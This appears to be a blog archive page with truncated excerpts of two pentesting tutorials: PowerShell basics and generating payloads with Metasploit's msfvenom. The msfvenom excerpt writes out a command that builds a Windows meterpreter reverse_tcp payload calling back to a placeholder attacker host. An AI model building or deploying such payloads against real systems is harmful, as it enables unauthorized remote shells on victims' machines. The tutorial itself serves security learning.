Posts

Showing posts from January, 2023

Powershell Basics Part -1

Image
            Basics Of Powershell - Part 1 PowerShell is used for automation of tasks , configuration and for scripting purposes , learning powershell will make our lifes a lot easier than we think and a pentester learning basics of powershell is always going to benifit us as most of the industries use windows and these are the small things that sets apart from the rest ! So lets dive into it Getting Started with Powershell : Lets lauch powershell Just go and search "powershell" in the windows search bar and hit enter Fig : 1.0 Fig : 1.0  To lauch it as an adminsitrator we can by right clicking it and run it as administrator or you can simply press ctrl+shift+enter Fig : 1.1 In Fig : 1.1 we can see our beautiful baby powershell In Linux the things we execute are know as commands and here it is a bit different , they are known as commandlets .And there are literally thousands of commandlets that can be executed in powershell Before we get to execute thes...

Generating Payloads using Msfvenom - Metasploit Part 5

Image
Generating and encoding Payloads using  Msfvenom Well aparantely msfvenom is a seperate tool from msfconsole which is used to generate payloads but it doesn't mean that we cannot create payloads using msfconsole but the advantage of using msfvenom is that there is no need for us to be in the msfconsole to generate payloads but no worries we will be covering both the methods :) So let's hop onto it shall we ! Command : msfvenom --list Fig : 1.1 In Fig : 1.1 we can see using the command we can list a brief instructions on how to use different options with it To list different types of modules we can use Command : msfvenom --list [modules] eg:payloads Fig : 1.2 In Fig : 1.2 we can see the different types of available payloads we can use with msfvenom and obviously it is going to take a while when you execute the command to load loads of payloads Let's create a meterpreter staged payload Command : msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=port_number -...